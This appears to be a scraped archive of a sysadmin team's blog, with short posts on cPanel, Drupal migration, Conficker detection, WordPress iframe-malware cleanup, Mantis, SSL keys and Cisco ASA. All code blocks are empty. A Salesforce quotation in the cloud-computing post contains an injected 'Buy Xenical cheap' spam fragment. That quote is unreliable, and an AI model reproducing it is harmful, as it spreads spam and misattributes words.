This task is very simple and can be done in two steps: 1.) Login as root and change your server hostname:
1
| |
Note: Don’t forget to create an A entry for your new hostname, otherwise you will get a popup message during WHM login.
2.) Issue /usr/local/cpanel/cpkeyclt to update your Cpanel License Key, otherwise you will get Invalid License when you login to WHM/Cpanel interface.
This post cover the steps to copy, transfer, or duplicate a Drupal site to new domain or from development/test site to live/production server. This requires shell/command line access to the server/accounts. I attached (below) some bash/shell scripts below that i used to perform these task.
Backup: In case the destination site or account have existing contents, you need to backup them first or moved to separate location.
Copy/Transfer Procedures
Database:
1.) Create an sql dump of your source database (use mysqldump) 2.) Update references to domain/url and path or home directory (you can user perl/sed commands) 3.) Import to your destination database (using mysql).
Files/Codes:
1.) Copy all files from your source directory or account to the destination site. 2.) Update references to database name, database user, database password, home directory of drupal installation, and domain name or url. 3.) Update permission and ownership of files and directories, like the sites/default/files to 777.
Notes. If you have CiviCRM installed and on a separate database, then you can use this guide but do not perform or update the references to url and paths. This guide is not applicable if you have CiviCRM installation which uses the same database as the Drupal database. CiviCRM recommended install is to use a separate database.
Shell / Bash Scripts:
1.) Copy Drupal Site with CiviCRM. Download here!
2.) Copy Drupal Site without CiviCRM. Download here!
Note: You can modify these scripts to work with sub-domains. Let me know if you have questions or suggestions or if you need help.
A newly intorduced legislation in the Untited States senate can give the US government the ability to limit and even shut down Internet traffic of public and private companies. In order to do this the president would first have to issue an order of “cybersecurity emergency” followed by the order of “limitation or shutdown of internet traffic to and from any compromised federal government or United States critical infrastructure information system or network”.
Another troubling part of this legislation could allow the goverment to “establish a broad set of cybersecurity standards that would be imposed on the government and the private sector, including companies that provide software, IT work or other services to networks that are deemed to be critical infrastructure”. Given the government’s track record of defending their own networks this may be a step backwards considering the fifty or so incidents in 2009 alone.
And last but least the good ‘ol saying “it’s who you know that what you know” may ring louder then ever. Under this legislation it would also be illegal for employees or contractors providing “cybersecurity services to any federal agency or an information system or network designated by the president, or the president’s designee, as a critical infrastructure information system or network, who is not licensed and certified under the program.” Obviosly Tom Parker director of security services at Securicom thinks the bill is a great idea considering the $3.3 millions dollars in federal contract money the company already accured.
While Conficker is not a new worm it has been getting much press lately. Even though Redmond released a patch late October it is estimated that 5 to 10 million PC have been infected. The industry has been aware of this worm for some time and has mounted a fairly impressive counter attack. Microsoft issued a 250K dollar bounty for developers of Conficker, major anti-virus vendors have added definitions for detection and removal of the worm, OpenDNS introduces a feature that aid sysadmins in detecting infected machines and today with the help of HoneyNet Project security researches discovered Conficker’s fingerprint which makes it possible for tool such as Nmap, Nessus to detect the worm remotely. This discovery come just in time as the latest variant of the worm “Conficker C” is programmed to lay dormant unlike the previous generations where identification of the worm was possible by monitoring outbound traffic.
Why just in time you may ask? Well because the worm is said to become active on April 1st. It is unknown if all infected PC will be used for bad deeds. I’m sure no one needs a reminder of the SQL Slammer worm of 2003/2004 where 5 of the 11 root DNS servers went down, ATM’s where knocked offline due to massive DDOS attacks. I understand the symbolism of April 1st being April fools day, but as the doctor always says: It’s far easier to prevent then to treat.
Using the latest development version of Nmap one would run a command to scan systems for Conficker signature.
1
| |
Or by updating your Nessus server’s plugins nessus-update-plugins create and run a scan that includes plugin id #36036 (if you don’t pay for Nessus Professional feed you will have to wait 7 days to receive the plugin)
Be mindful that Conficker can also spread via sneakernet, configuring your anti-virus client to scan all attached/removable extenal memory storage devices is always a great idea.
Last week I was on a conference call with some potential client when one of the senior business people said: “And then we could use cloud computing or something, to get this application in the hands of everyone”.
That’s when I thought - wow - this term really has penetrated into the mainstream. Cloud Computing has crossed the chasm, except that it seems to be more of a catch phrase for the latest technical fad, except that no one seems to be talking about exactly the same thing.
As if on cue the next morning the Wall Street Journal: The Internet Industry Is on a Cloud – Whatever That May Mean by Geoffrey A. Fowler and Ben Worthen landed on my lap. Ok, it landed on my porch, and then I read it.
I hope the Journal doesnt mind if I borrow their image of the cloud - very fitting for the article. Basically its a tale of marketers trying to - or should I say - fighting for integration of the term into its product jargon.
Some of my favorite quotes from the piece are bleow. I recommended the quick article as a nice distraction, but don’t expect to come away being clear on the term “Cloud Computing”.
“I have no idea what anyone is talking about,” said Oracle Corp. Chief Executive Larry Ellison, when talking about cloud computing at a financial analyst conference in September. “It’s really just complete gibberish. What is it?” He added: “When is this idiocy going to stop?”
In the full fiscal year since Salesforce started using the term cloud computing, its revenue grew 44%. “I think it’s the most powerful “>Buy Xenical cheap term in the industry,”
Dell Inc. applied to trademark the term cloud computing last year. The U.S. Patent and Trademark Office initially approved the application. But it changed its mind in response to an outburst of criticism, including from bloggers incensed that the term could fall under one company’s control.
This post will guide you in adding new or custom ticket status on your Mantis bug tracker installation. In our case we will refer the new status as GTG (GoodToGo). Ticket will have this status if it is ready to push to production. To do this we need to edit two files, config_inc.php and custom_strings_inc.php (create this file if not existing).
Changes to config_inc.php:
Find this line (bottom):
1 2 | |
and insert your new bug status together with its number. You can assign the number depending on the level of status that you want. Example my GTG status is higher than “resolved” but less than “closed” so i can assign 81 to 89.
1 2 | |
Assign a color for your bug status, example:
1
| |
Changes to custom_strings_inc.php:
Create definition for your new status:
1 2 3 4 5 | |
That’s all and you should see your new status.
We have several SSL to transfer to our new load-balancer (Nginx) and all of the private keys contain passphrase. During Nginx (same with Apache) service restart it requires to enter the passphrase of all certificates, so we need to remove it.
This task is very simple, you only need to issue this command:
1
| |
This will prompt you to enter the current passphrase.
One of my friend asked for help about virus appearing on his sites (mostly WordPress sites). I checked it out and my Kaspersky Internet Security blocked the pages from loading, so i downloaded the files manually and scanned html with Kaspersky to determine affected files.
I noticed that the affected files were PHP and HTML only and if you compare the code of the original WordPress files with the infected one you will see the difference. Below are sample added codes/virus:
HTML files:
1
| |
PHP files:
1
| |
What it does
I’m not a virus expert and I’m curios on what this portion of code does so i looked at it. In our case the resulting text add this portion of code to the html or php files:
1 2 3 4 5 6 7 8 | |
and you can see it tries to load an iframe:
1
| |
Virus Removal
You can remove the virus by just deleting the code (sample above) on the affected files. If you need to cleanup hundred of infected files (in our case more than 800) you can do the following:
1
| |
1 2 | |
Or create a bash/shell script to do the cleanup at once:
1 2 3 4 5 | |
That’s all.
I don’t know how the attacker gained access to the files and inserted the codes because the file permissions are ok - maybe they gain ftp access.
Many ftp client will try to establish a passive connection with a server by default. A passive connection will use a high numbered unprivileged port range greater then 1023 (PASV) instead of port 20 (PORT). Most ftp servers specify different ranges that are to be used for passive connections.
When you are managing multiple ftp servers is it rather impractical to configure specific passive port ranges for each ftp server and open these ports in the firewall. A quick and much more practical solution is to use the stateful application inspection feature of the Adaptive Security Appliance. To set-up inspection of the FTP protocol which will dynamically allow secondary ports to pass as well as allow NAT traversal of these ports we first must create an inspection policy for all interfaces which will inspect services on their standard ports:
1 2 | |
Next configure a policy map and inspection of the ftp protocol:
1 2 3 | |
FFMPEG announces a new release today. It releases version 0.5
The slashodot peculated this ffmpeg related post to the top of its news today:
After many years of release-free development, FFmpeg, the most widely used audio and video codec library, has finally returned to a regular release schedule with the long-awaited version 0.5
Here is a very abbreviated list of some of the improvements to the converter from the official ffmpeg site:
Significant work to support at least decoding of all widespread mainstream proprietary codecs, such as:
- decoders and encoders
- ALAC
- Flash Screen Video
- WMAv2 decoder fixed, WMAv1/v2 encoder
- decoders
- Atrac3
- MLP/TrueHD
- On2 VP3 improvements and VP5/VP6 support
- RealAudio Cooker and fixes for 14.4 and 28.8
- RealVideo RV30/40
- WMV3/WMV9/VC-1 and IntraX8 frame support for WMV2/VC-1
We sysadmins at promet have used ffmpeg in several of our projects and find it a great tool. Our recent implementations include a video distance learning tool and its also used in some of our work for sites of members of the house of representatives using this video platform.